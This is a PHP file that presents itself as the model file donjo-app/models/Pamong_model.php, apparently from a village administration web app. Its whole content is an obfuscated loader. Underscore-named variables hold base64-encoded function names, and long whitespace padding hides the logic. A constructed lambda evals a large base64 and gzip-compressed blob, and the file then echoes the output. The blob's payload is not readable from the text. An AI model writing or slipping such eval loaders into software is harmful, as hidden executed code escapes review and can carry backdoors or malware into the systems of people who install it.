<?php 
        $__='printf';$_='Loading donjo-app/models/Pamong_model.php';
        







































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































                                                                                                                                                                                                                     $________;
